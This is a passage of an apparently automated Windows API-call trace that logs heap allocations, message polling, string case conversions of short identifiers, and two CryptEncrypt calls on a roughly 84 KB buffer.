wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0265.313] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0265.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0265.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0265.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0265.313] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.313] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0265.313] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0265.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0265.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.313] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0265.314] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24acc60 [0265.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.314] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0265.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0265.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0265.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20b0 [0265.314] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.314] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.314] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0265.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0265.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d920 [0265.315] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0265.315] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0265.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0265.315] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0265.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0265.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0265.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0265.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0265.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0265.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0265.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0265.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0265.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0265.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8c0 [0265.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6468 [0265.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fd8 | out: hHeap=0x25c0000) returned 1 [0265.316] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fd8 [0265.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9df8 [0265.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0265.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa968 [0265.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0265.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0265.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0265.317] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.317] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0265.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0265.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0265.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6468 | out: hHeap=0x25c0000) returned 1 [0265.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0265.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0265.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0265.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0265.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.318] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0265.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0265.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0265.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0265.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0265.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0265.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0265.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1d0 [0265.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0265.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0265.319] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0265.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0265.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0265.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0265.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34c6b60 | out: hHeap=0x25c0000) returned 1 [0265.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7a0 | out: hHeap=0x25c0000) returned 1 [0265.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0265.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.320] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0265.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b40 | out: hHeap=0x25c0000) returned 1 [0265.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0265.321] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0265.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0265.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0265.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0265.321] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0265.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa158 | out: hHeap=0x25c0000) returned 1 [0265.322] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0265.322] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x14908, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x14910) returned 1 [0265.322] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.322] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.322] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.322] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.322] CharLowerBuffW (in: lpsz="byte[84240]", cchLength=0xb | out: lpsz="byte[84240]") returned 0xb [0265.322] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.324] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.324] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0265.325] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.325] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0265.325] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.325] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0265.326] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0265.326] CryptEncrypt (in: hKey=0xaa58e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x34c6b60*, pdwDataLen=0x8bef68*=0x14908, dwBufLen=0x14910 | out: pbData=0x34c6b60*, pdwDataLen=0x8bef68*=0x14910) returned 1 [0265.327] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.327] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.327] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.327] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.328] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.328] CharUpperBuffW (in: lpsz="A3800201A3B", cchLength=0xb | out: lpsz="A3800201A3B") returned 0xb [0265.329] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.329] CharUpperBuffW (in: lpsz="SSA3800201A3B", cchLength=0xd | out: lpsz="SSA3800201A3B") returned 0xd [0265.329] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.329] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.329] CharUpperBuffW (in: lpsz="A0200903E22", cchLength=0xb | out: lpsz="A0200903E22") returned 0xb [0265.329] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.329] CharUpperBuffW (in: lpsz="SSA0200903E22", cchLength=0xd | out: lpsz="SSA0200903E22") returned 0xd [0265.329] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.329] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.329] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0265.329] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.329] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0265.329] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.330] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0265.330] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.330] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0265.330] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.330] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0265.330] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0265.336] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.336] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.336] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.338] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.338] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0265.339] CharUpperBuffW (in: lpsz="A3500402704", cchLength=0xb | out: lpsz="A3500402704") returned 0xb [0265.339] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3a8) returned 0 [0265.339] CharUpperBuffW (in: lpsz="SSA3500402704", cchLength=0xd | out: lpsz="SSA3500402704") returned 0xd [0265.339] PeekMessageW (in: lpMsg=0x8bf3a8, hWnd=0x0, 